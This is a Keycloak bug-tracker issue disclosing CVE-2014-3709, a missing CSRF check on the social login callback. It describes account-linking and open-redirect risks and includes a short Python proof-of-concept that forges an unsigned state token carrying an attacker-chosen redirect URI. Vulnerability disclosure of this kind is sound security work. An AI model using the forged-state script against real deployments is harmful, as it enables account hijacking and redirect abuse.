Uploaded image for project: 'Keycloak'
  1. Keycloak
  2. KEYCLOAK-765

CVE-2014-3709 SocialResource callback CSRF

    XMLWordPrintable

Details

    • Bug
    • Status: Closed (View Workflow)
    • Major
    • Resolution: Done
    • 1.0.1.Final
    • 1.0.3.Final
    • None
    • None
    • This issue is security relevant
    • Hide

      I used the script below to experiment with this feature. The code was obtained over the Github API.

      social-callback.py
      import json
      from urllib import quote
      import urllib2
      from base64 import b64encode
      
      callback_uri = 'http://localhost:8080/auth/social/callback'
      
      def b64json(obj):
          result = b64encode(json.dumps(obj), "-_")
          while result[-1:] == '=':
              result = result[:-1]
          return result
      
      def build_jwt(header, content):
          return b64json(header) + '.' + b64json(content)
      
      state = build_jwt(
          {},
          content = {
              "realm" : "master",
              "provider" : "github",
              "attributes" : {
                  "client_id" : "security-admin-console",
                  "redirect_uri" : "http://redhat.com/redirect", # open redirector
              },
          })
      print state
      
      code = "1fd30ea95e58a1402670"
      
      uri = "{}?code={}&state={}".format(
          callback_uri, quote(code), quote(state))
      print repr(uri)
      req = urllib2.urlopen(uri)
      print repr(req)
      
      Show
      I used the script below to experiment with this feature. The code was obtained over the Github API. social-callback.py import json from urllib import quote import urllib2 from base64 import b64encode callback_uri = 'http: //localhost:8080/auth/social/callback' def b64json(obj): result = b64encode(json.dumps(obj), "-_" ) while result[-1:] == '=' : result = result[:-1] return result def build_jwt(header, content): return b64json(header) + '.' + b64json(content) state = build_jwt( {}, content = { "realm" : "master" , "provider" : "github" , "attributes" : { "client_id" : "security-admin-console" , "redirect_uri" : "http: //redhat.com/redirect" , # open redirector }, }) print state code = "1fd30ea95e58a1402670" uri = "{}?code={}&state={}" .format( callback_uri, quote(code), quote(state)) print repr(uri) req = urllib2.urlopen(uri) print repr(req)

    Description

      The /auth/social/callback implemented in org.keycloak.services.resources.SocialResource.callback(String) looks as if it may need CSRF protection.

      I see multiple potential issues here:

      1. A logged-in user might be associated with a social account supplied by the attacker, granting the attacker access to the Keycloak-managed account.
      2. There appears to be an open redirector (see the comment “open redirector” in the script below).
      3. An attacker could use this interface to create a high volume of OAuth API calls to the social web authentication provider, which might result in blacklisting of the Keycloak service. This aspect should be a consideration when deciding which kind of CSRF countermeasure to implement.

      I have no clean reproducer for the first two issues, but the reflector attack works (but I didn't push it to the point at which Github would blacklist me).

      Attachments

        Activity

          People

            sthorger@redhat.com Stian Thorgersen
            fweimer@redhat.com Florian Weimer
            Bill Burke (Inactive), Stian Thorgersen, Trevor Jay (Inactive)
            Votes:
            0 Vote for this issue
            Watchers:
            4 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: